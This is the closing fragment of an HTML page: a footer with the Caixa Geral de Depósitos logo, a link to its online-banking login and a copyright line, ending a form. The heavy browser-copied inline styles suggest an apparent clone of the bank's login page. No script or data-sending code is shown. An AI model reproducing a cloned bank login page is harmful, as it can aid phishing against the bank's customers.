			<a style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-size: 16px; font-family: Arial; vertical-align: middle;" href="https://caixadirectaonline.cgd.pt/cdo/login.seam#">
			<img src="https://static.cgd.pt/staticCMS/cdo/global/img/logo_CGD_footer.gif" alt="Caixa Geral de Depósitos" width="153px" heigth="19px" border="0px" style="margin: 5px auto; padding: 0px; border: 0px; outline: 0px; font-size: 16px; font-family: Arial; vertical-align: middle; clear: both; display: block; text-align: center;"></a></div>
	</div>
	<div class="footernotes" style="margin: 0px 146px; padding: 0px; border: 0px; outline: 0px; font-size: 0.56em; font-family: Arial; vertical-align: middle; clear: both; width: 710px; color: rgb(136, 136, 136); text-align: center; line-height: 12px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255); text-decoration-style: initial; text-decoration-color: initial;">
		<p style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-size: 8.96px; font-family: Arial; vertical-align: middle;">
		(c) 1995 - 2020&nbsp;Caixa Geral de Depósitos, S.A. Todos os direitos 
		reservados.</div>
	<p>&nbsp;</div>
</form>
</div>
</div></body></html>